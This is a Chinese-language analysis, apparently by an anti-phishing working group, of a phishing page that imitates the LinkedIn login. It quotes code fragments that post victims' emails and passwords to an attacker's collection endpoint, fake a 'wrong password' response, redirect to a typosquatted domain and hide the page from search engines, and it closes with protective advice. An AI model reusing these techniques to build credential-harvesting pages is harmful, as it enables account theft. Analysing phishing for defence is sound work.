电子邮件网络钓鱼细节解析之点击外链钓鱼

一、钓鱼邮件内容

二、钓鱼网站页面

三、钓鱼网页代码

四、代码细节解析

这个钓鱼页面代码经过精心设计，模仿LinkedIn登录界面以窃取用户凭证。以下是关键代码的详细分析：

1. 数据收集端点

//javascript

const url = 'https://confederationciq.fr/media/editors/proxx.php';

这是攻击者的服务器接口，用于接收窃取的邮箱和密码。

2. 邮箱预填充机制

//javascript

var email = window.location.hash.substr(1);

$('#user').val(my_email);

通过URL哈希值获取预设邮箱（如http://恶意域名#victim@company.com），增强页面可信度。

3. 凭证窃取逻辑

//javascript

function Validate(){

$.post(url, {user:a,pass:b}, function(){...});

}

使用AJAX将用户输入的邮箱密码实时发送到攻击者服务器，无需页面跳转。

4. 交互欺骗设计

//javascript

//提交后视觉欺骗

$('#bg').fadeOut();

$('#bg2').fadeIn();

$('#pass').val('');

提交后切换背景并清空密码框，模拟登录失败体验，诱使用户重复输入。

5. 重定向策略

//javascript

if(c>=2){ window.location='https://linkinedin.com'; }

故意拼错域名(linkinedin vs linkedin)，重定向到高仿页面延续攻击链条。

6. 反检测措施

//html

<meta name="robots" content="noindex,nofollow">

<META NAME="GOOGLEBOT" CONTENT="NOARCHIVE,NOSNIPPET">

禁止搜索引擎收录，避免被安全公司扫描发现。

7. 视觉欺骗元素

使用LinkedIN品牌logo (‘resources/logo.png’)

精确复刻登录框阴影效果(‘box-shadow’)

中文验证提示提升本地化可信度

8. 输入监控

//javascript

$('input').focus/blur(...)

实时监控输入框状态，提供拟真视觉反馈。

五、攻击流程

1. 用户点击携带预设邮箱的钓鱼链接

2. 页面展示看似正常的LinkedIn验证界面

3. 用户输入密码后数据立即发送到攻击者服务器

4. 伪造"密码错误"提示诱导多次输入

5. 最终跳转到伪装的拼写错误域名

六、防护建议

1. 检查域名拼写（注意形近字攻击）

2. 避免点击邮件中的直接登录链接

3. 启用双因素认证(2FA)

4. 使用密码管理器自动识别伪造页面

5. 定期检查账号登录活动记录

七、总结

这种钓鱼攻击结合了社会工程学和技术欺骗手段，需要用户和安全系统（如邮件网关、Web过滤器）协同防御才能有效应对。

编辑：芦笛（公共互联网反网络钓鱼工作组）